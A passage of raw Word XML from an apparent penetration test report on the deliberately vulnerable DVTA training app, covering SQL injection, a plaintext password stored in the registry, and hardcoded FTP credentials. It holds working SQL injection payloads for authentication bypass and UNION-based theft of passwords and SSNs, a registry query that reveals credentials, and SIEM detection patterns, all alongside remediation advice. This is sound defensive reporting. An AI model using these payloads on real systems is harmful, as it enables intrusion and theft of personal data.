              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">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69">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">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Step 1: Enter the following in the Login form Username field (Password field empty):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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 OR '1'='1' --</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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Step 2: Application constructs and executes:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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SELECT * FROM users where username='' OR '1'='1' --' and password=''</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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Step 3: All rows returned — sqlDataReader.HasRows = true — authentication bypassed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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Step 4 (data extraction):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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 UNION SELECT 1,username,password,email,ssn,isadmin FROM users --</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:after="120" w:before="24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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figures 2a–2e (F1: SQL Injection)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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3506470" cy="2041525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="20" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="21" name="Shape 21"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3599115" y="2765588"/>
                          <a:ext cx="3493770" cy="202882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3506470" cy="2041525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="20"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3506470" cy="204152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73">
      <w:pPr>
        <w:spacing w:after="18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2a — Screenshot (F1-PoC-1): SQL Injection bypass payload (' OR '1'='1' --) entered in the Username field of the DVTA Login form, with an arbitrary password value.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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3622675" cy="1979295"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="12" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="13" name="Shape 13"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3541013" y="2796703"/>
                          <a:ext cx="3609975" cy="19665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3622675" cy="1979295"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="1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3622675" cy="19792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75">
      <w:pPr>
        <w:spacing w:after="18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2b — Screenshot (F1-PoC-2): Authentication bypassed — DVTA Main panel opened as "testuser" with no valid credentials. Confirms sqlDataReader.HasRows = true triggered by the OR 1=1 injection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="114300" distR="114300">
                <wp:extent cx="3506470" cy="2041525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="11" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="12" name="Shape 12"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3599115" y="2765588"/>
                          <a:ext cx="3493770" cy="202882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3506470" cy="2041525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>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3506470" cy="2041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7">
      <w:pPr>
        <w:spacing w:after="18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2c — Screenshot (F1-PoC-3): UNION SELECT data extraction payload entered in the Username field to enumerate the full users table (username, password, email, ssn, isadmin).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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2752725" cy="1398270"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="14" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="15" name="Shape 15"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3975988" y="3087215"/>
                          <a:ext cx="2740025" cy="138557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752725" cy="1398270"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="1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752725" cy="1398270"/>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79">
      <w:pPr>
        <w:spacing w:after="18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2d — Screenshot (F1-PoC-4): Admin panel ("Welcome Admin") reached via SQLi privilege escalation — isadmin flag forced to 1 through UNION injection, bypassing the role check in Login.cs (also relates to F5).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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840605" cy="2145030"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="13" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="14" name="Shape 14"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="2713835"/>
                          <a:ext cx="4827905" cy="213233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840605" cy="2145030"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="1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4840605" cy="2145030"/>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7B">
      <w:pPr>
        <w:spacing w:after="22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2e — Screenshot (F1-PoC-5): dnSpy 6.1.8 decompiled source showing checkLogin() in DBAccessClass.cs — vulnerable string.Concat() query construction with raw clientusername and clientpassword parameters (Lines 5-16), confirming the root cause of the SQL injection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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6"/>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07D">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The login query is built via string.Concat() with no escaping or parameterization. The OR 1=1 payload forces the WHERE clause true for every row. Authentication is bypassed without any valid credential. UNION extraction returns the full users table including plaintext passwords (see Finding 2) and isadmin flag (see Finding 5).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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27ae60"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection (SOC)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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SIEM: TDS login packet where username field matches pattern (' OR | UNION SELECT | 1=1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Threshold: &gt;3 failed logins from same source IP in 60s -&gt; alert MEDIUM; &gt;5 -&gt; auto-block</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Single login with SQL metacharacter -&gt; alert HIGH, terminate session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Replace all string.Concat query construction with SqlParameter parameterized queries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Adopt Entity Framework ORM to eliminate raw SQL across all DBAccessClass methods</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Input validation: reject username/password inputs containing SQL metacharacters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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87">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088">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7"/>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08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2  —  Plaintext Password Written to Windows Registry</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8B">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CWE-312</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8C">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8.4  —  Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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8E">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08F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Fig-03: Login.cs Line 85 — registryKey.SetValue("password", string2) after successful login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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string2 = sqlDataReader.GetString(2) — raw plaintext password column from DB result</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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92">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10" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="11" name="Shape 11"/>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93">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3 — Login.cs Lines 79–88: password written to HKCU\dvta\password in cleartext</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">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95">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096">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After a successful login, btnLogin_Click() reads the plaintext password from the DB result set (column index 2) and writes it directly to the Windows Registry under HKCU\dvta\password. No hashing, encryption, or protection is applied.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>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097">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Login.cs  Line 79–87  (btnLogin_Click)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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@string = sqlDataReader.GetString(1);  // username</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">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string string2  = sqlDataReader.GetString(2); // password — raw from DB</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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string3  = sqlDataReader.GetString(3); // email</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">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RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("dvta");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">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registryKey.SetValue("password", string2);  // PLAINTEXT TO REGISTRY</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">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registryKey.SetValue("isLoggedIn", "true");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">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9F">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">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After logging in to DVTA as any user, execute in cmd.exe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">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reg query HKCU\dvta</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">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Output reveals username, email, and plaintext password:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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HKCU\dvta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">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    username    REG_SZ    testuser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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    password    REG_SZ    test123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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    email       REG_SZ    test@dvta.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">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    isLoggedIn  REG_SZ    true</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:spacing w:after="140" w:before="2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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figure 3a (F2: Plaintext Password in Registry)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">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840605" cy="2483485"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="9" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="10" name="Shape 10"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="2544608"/>
                          <a:ext cx="4827905" cy="247078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840605" cy="2483485"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>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4840605" cy="248348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AA">
      <w:pPr>
        <w:spacing w:after="20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3a — Screenshot (F2-PoC): sqlcmd query showing plaintext credentials in DB (admin:YWRtaW4=, testuser:test123), and reg query HKCU\dvta exposing session credentials including plaintext password. DVTA Main panel confirms authenticated session.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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9"/>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0AC">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The plaintext password is written to the registry by the application itself after every login. Any local process with HKCU read access — the default for all user-space processes — recovers the current user password without any privilege escalation. This persists until the next login overwrites it.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">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0AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Never persist passwords in any form after login — use a session token instead</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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If local state is required, store only a signed session token (HMAC-SHA256 minimum)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Delete the password registry value immediately after authentication is complete</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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B2">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0B3">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0"/>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0B4">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3  —  Hardcoded FTP Credentials in Source Code</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B6">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CWE-798</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B7">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9.8  —  Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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B9">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0BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Fig-04: Admin.cs Line 43 — literal strings "dvta" and "p@ssw0rd" in Upload() call</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Config: DVTA.exe.config also contains FTPPassword=password (separate credential)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">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BD">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23" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="24" name="Shape 24"/>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23"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BE">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4 — Admin.cs Line 43: FTP credentials hardcoded in source  +  cleartext WebClient upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">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C0">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0C1">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Admin.cs hardcodes FTP username "dvta" and password "p@ssw0rd" as string literals in the Upload() call. Additionally, DVTA.exe.config contains FTPUser=dvta and FTPPassword=password in plaintext. These credentials are visible via static analysis, strings extraction, or simple config file read.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
